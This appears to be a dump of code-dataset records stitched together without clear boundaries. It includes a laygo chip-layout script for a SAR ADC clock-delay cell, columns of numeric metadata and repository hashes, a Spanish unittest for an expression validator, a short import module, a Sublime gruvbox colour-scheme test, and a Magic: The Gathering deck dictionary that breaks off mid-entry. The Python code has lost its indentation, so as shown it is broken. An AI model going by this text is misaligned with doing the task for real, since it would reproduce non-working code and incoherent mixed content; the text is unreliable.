laygen.pin_from_rect('VDD'+str(2*i-2), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-2), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2+1, 0]), xy1=np.array([2*i+2+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-1), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-1), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
for j in range(0, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+2+1, 0]), xy1=np.array([2*j+2+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+2, 0]), xy1=np.array([2*j+2, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
if __name__ == '__main__':
laygen = laygo.GridLayoutGenerator(config_file="laygo_config.yaml")
import imp
try:
imp.find_module('bag')
laygen.use_phantom = False
except ImportError:
laygen.use_phantom = True
tech=laygen.tech
utemplib = tech+'_microtemplates_dense'
logictemplib = tech+'_logic_templates'
laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib)
laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib)
laygen.load_template(filename=logictemplib+'.yaml', libname=logictemplib)
laygen.templates.sel_library(utemplib)
laygen.grids.sel_library(utemplib)
#library load or generation
workinglib = 'adc_sar_generated'
laygen.add_library(workinglib)
laygen.sel_library(workinglib)
if os.path.exists(workinglib+'.yaml'): #generated layout file exists
laygen.load_template(filename=workinglib+'.yaml', libname=workinglib)
laygen.templates.sel_library(utemplib)
#grid
pg = 'placement_basic' #placement grid
rg_m1m2 = 'route_M1_M2_cmos'
rg_m1m2_thick = 'route_M1_M2_thick'
rg_m2m3 = 'route_M2_M3_cmos'
rg_m3m4 = 'route_M3_M4_basic'
rg_m4m5 = 'route_M4_M5_basic'
rg_m5m6 = 'route_M5_M6_basic'
rg_m1m2_pin = 'route_M1_M2_basic'
rg_m2m3_pin = 'route_M2_M3_basic'
#display
#laygen.display()
#laygen.templates.display()
#laygen.save_template(filename=workinglib+'_templates.yaml', libname=workinglib)
mycell_list = []
num_bits=9
#load from preset
load_from_file=True
yamlfile_system_input="adc_sar_dsn_system_input.yaml"
if load_from_file==True:
with open(yamlfile_system_input, 'r') as stream:
sysdict_i = yaml.load(stream)
num_bits=sysdict_i['n_bit']
#cell generation (slice)
cellname='sarclkdelayslice'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelayslice(laygen, objectname_pfix='DSL0', templib_logic=logictemplib, placement_grid=pg,
routing_grid_m3m4=rg_m3m4, m=1, origin=np.array([0, 0]))
laygen.add_template_from_cell()
# array generation (2 step)
cellname='sarclkdelay'
print(cellname+" generating")
mycell_list.append(cellname)
# 1. generate without spacing
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelay(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=0, m_space_2x=0, m_space_1x=0,
origin=np.array([0, 0]))
laygen.add_template_from_cell()
#2. calculate spacing param and regenerate
x0 = laygen.templates.get_template('sarafe_nsw_'+str(num_bits-1)+'b', libname=workinglib).xy[1][0] \
- laygen.templates.get_template(cellname, libname=workinglib).xy[1][0] \
- laygen.templates.get_template('nmos4_fast_left').xy[1][0] * 2
m_space = int(round(x0 / laygen.templates.get_template('space_1x', libname=logictemplib).xy[1][0]))
m_space_4x=int(m_space/4)
m_space_2x=int((m_space-m_space_4x*4)/2)
m_space_1x=int(m_space-m_space_4x*4-m_space_2x*2)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelay(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=m_space_4x, m_space_2x=m_space_2x,
m_space_1x=m_space_1x, origin=np.array([0, 0]))
laygen.add_template_from_cell()
#cell generation (slice_compact)
cellname='sarclkdelayslice_compact'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelayslice_compact(laygen, objectname_pfix='DSL0', templib_logic=logictemplib, placement_grid=pg,
routing_grid_m3m4=rg_m3m4, m=1, origin=np.array([0, 0]))
laygen.add_template_from_cell()
cellname='sarclkdelayslice_compact_2x'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelayslice_compact_2x(laygen, objectname_pfix='DSL0', templib_logic=logictemplib, placement_grid=pg,
routing_grid_m3m4=rg_m3m4, m=1, origin=np.array([0, 0]))
laygen.add_template_from_cell()
#array generation (2 step)
cellname='sarclkdelay_compact'
print(cellname+" generating")
mycell_list.append(cellname)
# 1. generate without spacing
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelay_compact(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=0, m_space_2x=0, m_space_1x=0,
origin=np.array([0, 0]))
laygen.add_template_from_cell()
#2. calculate spacing param and regenerate
x0 = laygen.templates.get_template('sarafe_nsw_'+str(num_bits-1)+'b', libname=workinglib).xy[1][0] \
- laygen.templates.get_template(cellname, libname=workinglib).xy[1][0] \
- laygen.templates.get_template('nmos4_fast_left').xy[1][0] * 2
m_space = int(round(x0 / laygen.templates.get_template('space_1x', libname=logictemplib).xy[1][0]))
m_space_4x=int(m_space/4)
m_space_2x=int((m_space-m_space_4x*4)/2)
m_space_1x=int(m_space-m_space_4x*4-m_space_2x*2)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelay_compact(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=m_space_4x, m_space_2x=m_space_2x,
m_space_1x=m_space_1x, origin=np.array([0, 0]))
laygen.add_template_from_cell()
# dual_array generation (2 step)
cellname='sarclkdelay_compact_dual'
print(cellname+" generating")
mycell_list.append(cellname)
# 1. generate without spacing
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelay_compact_dual(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=0, m_space_2x=0, m_space_1x=0,
origin=np.array([0, 0]))
laygen.add_template_from_cell()
#2. calculate spacing param and regenerate
x0 = laygen.templates.get_template('sarafe_nsw_'+str(num_bits-1)+'b', libname=workinglib).xy[1][0] \
- laygen.templates.get_template(cellname, libname=workinglib).xy[1][0] \
- laygen.templates.get_template('nmos4_fast_left').xy[1][0] * 2
m_space = int(round(x0 / laygen.templates.get_template('space_1x', libname=logictemplib).xy[1][0]))
m_space_4x=int(m_space/4)
m_space_2x=int((m_space-m_space_4x*4)/2)
m_space_1x=int(m_space-m_space_4x*4-m_space_2x*2)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_sarclkdelay_compact_dual(laygen, objectname_pfix='CKD0', templib_logic=logictemplib, workinglib=workinglib,
placement_grid=pg, routing_grid_m3m4=rg_m3m4, m_space_4x=m_space_4x, m_space_2x=m_space_2x,
m_space_1x=m_space_1x, origin=np.array([0, 0]))
laygen.add_template_from_cell()
laygen.save_template(filename=workinglib+'.yaml', libname=workinglib)
#bag export, if bag does not exist, gds export
import imp
try:
imp.find_module('bag')
import bag
prj = bag.BagProject()
for mycell in mycell_list:
laygen.sel_cell(mycell)
laygen.export_BAG(prj, array_delimiter=['[', ']'])
except ImportError:
laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+".layermap") # change layermapfile
| 65.257831
| 140
| 0.632413
| 7,346
| 54,164
| 4.495236
| 0.057174
| 0.069045
| 0.072073
| 0.022076
| 0.894676
| 0.876476
| 0.846133
| 0.831325
| 0.830174
| 0.827872
| 0
| 0.056811
| 0.203475
| 54,164
| 829
| 141
| 65.33655
| 0.708597
| 0.087161
| 0
| 0.730645
| 0
| 0
| 0.053449
| 0.005465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01129
| false
| 0
| 0.016129
| 0
| 0.027419
| 0.009677
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb8385f4b0b10b57bc9b52d2001a3a06024b7bd2
| 1,841
|
py
|
Python
|
Clase7/test_es_valida.py
|
JoseCordobaEAN/EstructurasDeDatosUE4P
|
86a5c426d83d9d9ae86656c3c78324a1c07f608d
|
[
"MIT"
] | 2
|
2019-08-17T21:15:47.000Z
|
2019-09-21T12:15:19.000Z
|
Clase7/test_es_valida.py
|
JoseCordobaEAN/EstructurasDeDatosUE4P
|
86a5c426d83d9d9ae86656c3c78324a1c07f608d
|
[
"MIT"
] | null | null | null |
Clase7/test_es_valida.py
|
JoseCordobaEAN/EstructurasDeDatosUE4P
|
86a5c426d83d9d9ae86656c3c78324a1c07f608d
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from Clase7.analizador_de_expresiones import es_valida
class TestEs_valida(TestCase):
def test_es_valida_caso_regular(self):
expresion_de_prueba = '( a * b )'
self.assertTrue(es_valida(expresion_de_prueba))
expresion_de_prueba = '( ( ax % yb ) )'
self.assertTrue(es_valida(expresion_de_prueba))
expresion_de_prueba = '[ ( aaz + zbb ) ]'
self.assertTrue(es_valida(expresion_de_prueba))
expresion_de_prueba = '{ [ aafp / pwbb ] }'
self.assertTrue(es_valida(expresion_de_prueba))
expresion_de_prueba = 'a + b + c'
self.assertTrue(es_valida(expresion_de_prueba))
expresion_de_prueba = 'a '
self.assertTrue(es_valida(expresion_de_prueba))
def test_es_valida_caso_dos_variables(self):
expresion_de_prueba = 'a b'
self.assertFalse(es_valida(expresion_de_prueba))
expresion_de_prueba = 'xx yy'
self.assertFalse(es_valida(expresion_de_prueba))
def test_es_valida_caso_dos_operadores(self):
expresion_de_prueba = '* +'
print(f'probando {expresion_de_prueba}')
self.assertFalse(es_valida(expresion_de_prueba))
expresion_de_prueba = '% /'
print(f'probando {expresion_de_prueba}')
self.assertFalse(es_valida(expresion_de_prueba))
def test_es_valida_caso_parentesis_no_balanceados(self):
expresion_de_prueba = '( ( ( ) } )'
self.assertFalse(es_valida(expresion_de_prueba))
expresion_de_prueba = '( ( ( ] ] )'
self.assertFalse(es_valida(expresion_de_prueba))
def test_es_valida_caso_parentesis_sobrante(self):
expresion_de_prueba = ')'
self.assertFalse(es_valida(expresion_de_prueba))
expresion_de_prueba = '('
self.assertFalse(es_valida(expresion_de_prueba))
| 40.911111
| 60
| 0.691472
| 224
| 1,841
| 5.223214
| 0.1875
| 0.282051
| 0.435897
| 0.22735
| 0.852991
| 0.835897
| 0.835897
| 0.784615
| 0.784615
| 0.784615
| 0
| 0.000688
| 0.210212
| 1,841
| 45
| 61
| 40.911111
| 0.803989
| 0
| 0
| 0.421053
| 0
| 0
| 0.091748
| 0.022801
| 0
| 0
| 0
| 0
| 0.368421
| 1
| 0.131579
| false
| 0
| 0.052632
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6911c67b1c7c73a4fe9f3e81c008a6d105ffc51a
| 161
|
py
|
Python
|
json_typer/__init__.py
|
maspe36/JSONTyper
|
26d0bbf73c093cf8781a6946425cbede13c7c2dc
|
[
"MIT"
] | 4
|
2018-12-01T19:57:59.000Z
|
2022-03-25T18:51:09.000Z
|
json_typer/__init__.py
|
maspe36/JSONTyper
|
26d0bbf73c093cf8781a6946425cbede13c7c2dc
|
[
"MIT"
] | 1
|
2018-07-21T22:52:57.000Z
|
2018-12-01T18:09:45.000Z
|
json_typer/__init__.py
|
maspe36/json-typer
|
26d0bbf73c093cf8781a6946425cbede13c7c2dc
|
[
"MIT"
] | null | null | null |
from json_typer import io
from json_typer.serializables.serializable import Serializable
from json_typer.serializables.type_serializable import TypeSerializable
| 40.25
| 71
| 0.900621
| 20
| 161
| 7.05
| 0.45
| 0.170213
| 0.276596
| 0.368794
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074534
| 161
| 3
| 72
| 53.666667
| 0.946309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
692b788f1c72e000cdb703ffcdce376aa1c3ec8a
| 9,096
|
py
|
Python
|
color_scheme_tests/dark_medium/color_scheme_test.py
|
Briles/gruvbox
|
d127fc8887ea006ead49e97eed4d89955fbb5e16
|
[
"MIT"
] | 251
|
2016-03-04T04:32:10.000Z
|
2022-03-22T09:52:02.000Z
|
color_scheme_tests/dark_medium/color_scheme_test.py
|
Briles/gruvbox
|
d127fc8887ea006ead49e97eed4d89955fbb5e16
|
[
"MIT"
] | 50
|
2016-03-09T07:41:55.000Z
|
2021-01-20T11:09:56.000Z
|
color_scheme_tests/dark_medium/color_scheme_test.py
|
Briles/gruvbox
|
d127fc8887ea006ead49e97eed4d89955fbb5e16
|
[
"MIT"
] | 23
|
2016-05-21T19:57:27.000Z
|
2022-02-01T15:44:00.000Z
|
# COLOR SCHEME TEST "gruvbox/gruvbox (Dark) (Medium).sublime-color-scheme" "Python" # flake8: noqa
# This indented comment is to the preceding whitespace.
# ^ fg=#928374 fs=italic
# ^^^^ fg=#928374 fs=italic
# ^^^^^^^^ fg=#928374 fs=italic
# ^^^^^^^ fg=#928374 fs=italic
# ^^ fg=#928374 fs=italic
# ^^ fg=#928374 fs=italic
# ^^^ fg=#928374 fs=italic
# ^^^^^^^^^ fg=#928374 fs=italic
# ^^^^^^^^^^^ fg=#928374 fs=italic
import os
# ^^^^ fg=#fb4934 fs=
# ^^ fg=#ebdbb2 fs=
import path from os
# ^^^^ fg=#fb4934 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^^ fg=#ebdbb2 fs=
__all__
# ^^^^^ fg=#fabd2f fs=
__file__
# ^^^^^^ fg=#fabd2f fs=
__missing__
# ^^^^^^^^^ fg=#8ec07c fs=
__bool__
# ^^^^^^ fg=#8ec07c fs=
__debug__
# ^^^^^^^ fg=#d3869b fs=
abc = 'x'
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
BC = 'x'
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
x = ABC
# ^ fg=#8ec07c fs=
# ^^^ fg=#fabd2f fs=
x = "_\x00_\xaa_\'_%s_"
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
x = '_\m_\\m_'
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 bg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
x = b'x'
# ^ fg=#8ec07c fs=
# ^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
'ab'.upper()
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
x = '|'.join(sorted(x))
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^^^ fg=#ebdbb2 fs=
x = f"{x}"
# ^ fg=#8ec07c fs=
# ^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#83a598 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
def x():
# ^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
pass
# ^^^^ fg=#fb4934 fs=
def x():
"""x"""
# ^^^^^^^ fg=#928374 fs=italic
pass
def x():
"""
# ^^^ fg=#928374 fs=italic
x
# ^ fg=#928374 fs=italic
"""
# ^^^ fg=#928374 fs=italic
# pass
def x():
# ^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
abc = 'x'
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
call(x, 'y', True, False)
# ^^^^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
# ^^^^^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
call(x=y)
# ^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
if isinstance(var, list):
# ^^ fg=#fb4934 fs=
# ^^^^^^^^^^ fg=#8ec07c fs=
# ^^^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#fabd2f fs=
# ^^ fg=#ebdbb2 fs=
arr = []
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
arr.append('x')
# ^^^^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
arr.sort()
# ^^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
if len(x):
# ^^ fg=#fb4934 fs=
# ^^^ fg=#8ec07c fs=
# ^^^^ fg=#ebdbb2 fs=
print('Hi')
# ^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
fmt = 'x={}'.format(s['y'])
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^^ fg=#b8bb26 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^^^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
x = u'x%s' % y
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
x = "x {y} z".format(y=z)
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
x = re.match('^.+\\.x$')
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^^^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^^^ fg=#b8bb26 fs=
# ^^ fg=#ebdbb2 fs=
@requires_x
# ^^^^^^^^^ fg=#83a598 fs=
def f_name(arg1='', arg2=0):
# ^ fg=#8ec07c fs=
# ^^^^^^ fg=#b8bb26 fs=
# ^^^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^ fg=#d3869b fs=
# ^^ fg=#ebdbb2 fs=
if a > b: # x
# ^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#928374 fs=italic
# ^ fg=#928374 fs=italic
print 'a\'b'
# ^^^^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^^ fg=#fb4934 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
abc = d[0]
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
abc.d(e)
# ^^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
return None
# ^^^^^^ fg=#fb4934 fs=
# ^^^^ fg=#d3869b fs=
class X():
# ^^^ fg=#fb4934 fs=
# ^ fg=#fabd2f fs=
# ^^^ fg=#ebdbb2 fs=
pass
# ^^^^ fg=#fb4934 fs=
class X(Y):
# ^^^ fg=#fb4934 fs=
# ^ fg=#fabd2f fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#fabd2f fs=
# ^^ fg=#ebdbb2 fs=
def __init__(self):
# ^^^ fg=#8ec07c fs=
# ^^^^^^^^ fg=#8ec07c fs=
# ^^^^^^^ fg=#ebdbb2 fs=
self.x = 123
# ^^^^ fg=#d3869b fs=
# ^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#d3869b fs=
self.x()
# ^^^^ fg=#d3869b fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
self.x.y()
# ^^^^ fg=#d3869b fs=
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
abc(y)
# ^^^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
def __str__(self)
# ^^^ fg=#8ec07c fs=
# ^^^^^^^ fg=#8ec07c fs=
# ^^^^^^ fg=#ebdbb2 fs=
return 'x'
# ^^^^^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^ fg=#b8bb26 fs=
# ^ fg=#ebdbb2 fs=
def z(self, a, b):
# ^^^ fg=#8ec07c fs=
# ^ fg=#b8bb26 fs=
# ^^^^^^ fg=#ebdbb2 fs=
# ^^ fg=#ebdbb2 fs=
# ^^^ fg=#ebdbb2 fs=
if a == b:
# ^^ fg=#fb4934 fs=
# ^ fg=#ebdbb2 fs=
# ^^ fg=#8ec07c fs=
# ^^ fg=#ebdbb2 fs=
if fcall(a, b):
# ^^ fg=#fb4934 fs=
# ^^^^^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^ fg=#ebdbb2 fs=
return True
# ^^^^^^ fg=#fb4934 fs=
# ^^^^ fg=#d3869b fs=
return None
# ^^^^^^ fg=#fb4934 fs=
# ^^^^ fg=#d3869b fs=
@zyx
# ^ fg=#ebdbb2 fs=
# ^^^ fg=#83a598 fs=
def x(self):
pass
# ^^^^ fg=#fb4934 fs=
>>> msg = '''interpreter
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^ fg=#8ec07c fs=
# ^^^ fg=#ebdbb2 fs=
# ^^^^^^^^^^^ fg=#b8bb26 fs=
... prompt'''
# ^ fg=#b8bb26 fs=
# ^^^^^^ fg=#b8bb26 fs=
# ^^^ fg=#ebdbb2 fs=
| 23.027848
| 98
| 0.362467
| 984
| 9,096
| 3.311992
| 0.095528
| 0.230746
| 0.319116
| 0.338754
| 0.843203
| 0.830316
| 0.822645
| 0.783369
| 0.742559
| 0.664007
| 0
| 0.125667
| 0.423483
| 9,096
| 394
| 99
| 23.086294
| 0.495805
| 0.76847
| 0
| 0.238806
| 0
| 0
| 0.148246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.059701
| 0.029851
| null | null | 0.029851
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 12
|
15d6e0cb48886912b105e99e680b90805082271e
| 140,919
|
py
|
Python
|
new_magic/scripts/jumpstart.py
|
Wirox/mtg-octgn
|
6a56373a35350f5282fa369773cbceae490fa64a
|
[
"Unlicense"
] | 17
|
2015-01-04T18:15:34.000Z
|
2021-09-21T21:56:57.000Z
|
new_magic/scripts/jumpstart.py
|
Wirox/mtg-octgn
|
6a56373a35350f5282fa369773cbceae490fa64a
|
[
"Unlicense"
] | 38
|
2015-05-15T20:07:23.000Z
|
2021-08-28T14:53:50.000Z
|
new_magic/scripts/jumpstart.py
|
Wirox/mtg-octgn
|
6a56373a35350f5282fa369773cbceae490fa64a
|
[
"Unlicense"
] | 21
|
2015-01-12T21:51:22.000Z
|
2021-12-06T22:55:27.000Z
|
JumpstartDecks = {
"Above the Clouds-1": [
{
"id": "b238485f-ef67-4295-892b-a10235368f74",
"count": 1
},
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "d961c441-b76b-4bd8-b510-a3e073207a1b",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "8c58807d-1663-486a-ac94-627a8677f2b3",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
